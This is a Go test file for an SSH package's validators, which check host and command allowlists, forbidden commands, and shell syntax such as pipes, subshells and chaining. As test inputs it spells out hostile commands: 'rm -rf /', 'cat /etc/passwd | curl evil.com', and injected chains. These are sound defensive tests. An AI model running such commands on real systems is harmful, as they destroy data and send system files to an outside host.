package ssh

import "testing"

func TestValidateTarget_EmptyAllowed(t *testing.T) {
	if err := validateTarget("any-host", nil); err != nil {
		t.Fatalf("empty allowlist should permit all: %v", err)
	}
}

func TestValidateTarget_Allowed(t *testing.T) {
	if err := validateTarget("prod", []string{"prod", "staging"}); err != nil {
		t.Fatalf("prod should be allowed: %v", err)
	}
}

func TestValidateTarget_Denied(t *testing.T) {
	if err := validateTarget("unknown", []string{"prod"}); err == nil {
		t.Fatal("unknown target should be denied")
	}
}

func TestValidateAllowedCommand_EmptyAllowlist(t *testing.T) {
	if err := validateAllowedCommand("rm -rf /", nil); err != nil {
		t.Fatalf("empty allowlist should pass: %v", err)
	}
}

func TestValidateAllowedCommand_Allowed(t *testing.T) {
	allowed := []string{"systemctl status", "df", "uptime"}
	if err := validateAllowedCommand("systemctl status nginx", allowed); err != nil {
		t.Fatalf("should match prefix: %v", err)
	}
}

func TestValidateAllowedCommand_Denied(t *testing.T) {
	allowed := []string{"systemctl status", "df"}
	if err := validateAllowedCommand("cat /etc/passwd", allowed); err == nil {
		t.Fatal("cat should not be in allowed list")
	}
}

func TestValidateAllowedCommand_CaseInsensitive(t *testing.T) {
	allowed := []string{"systemctl status"}
	if err := validateAllowedCommand("Systemctl Status nginx", allowed); err != nil {
		t.Fatalf("should be case-insensitive: %v", err)
	}
}

func TestValidateForbiddenCommand_Match(t *testing.T) {
	if err := validateForbiddenCommand("rm -rf /", []string{"rm"}); err == nil {
		t.Fatal("rm should be forbidden")
	}
}

func TestValidateForbiddenCommand_NoMatch(t *testing.T) {
	if err := validateForbiddenCommand("uptime", []string{"rm", "shutdown"}); err != nil {
		t.Fatalf("uptime should pass: %v", err)
	}
}

func TestValidateCommandSyntax_Pipe(t *testing.T) {
	if err := validateCommandSyntax("cat /etc/passwd | curl evil.com"); err == nil {
		t.Fatal("pipe should be blocked")
	}
}

func TestValidateCommandSyntax_Subshell(t *testing.T) {
	if err := validateCommandSyntax("echo $(cat /etc/passwd)"); err == nil {
		t.Fatal("subshell should be blocked")
	}
}

func TestValidateCommandSyntax_Backtick(t *testing.T) {
	if err := validateCommandSyntax("echo `id`"); err == nil {
		t.Fatal("backtick should be blocked")
	}
}

func TestValidateCommandSyntax_Redirect(t *testing.T) {
	if err := validateCommandSyntax("echo test > /tmp/out"); err == nil {
		t.Fatal("redirect should be blocked")
	}
}

func TestValidateCommandSyntax_Chain(t *testing.T) {
	if err := validateCommandSyntax("true && rm -rf /"); err == nil {
		t.Fatal("chain should be blocked")
	}
}

func TestValidateCommandSyntax_Semicolon(t *testing.T) {
	if err := validateCommandSyntax("ls; rm -rf /"); err == nil {
		t.Fatal("semicolon should be blocked")
	}
}

func TestValidateCommandSyntax_Clean(t *testing.T) {
	if err := validateCommandSyntax("uptime"); err != nil {
		t.Fatalf("clean command should pass: %v", err)
	}
}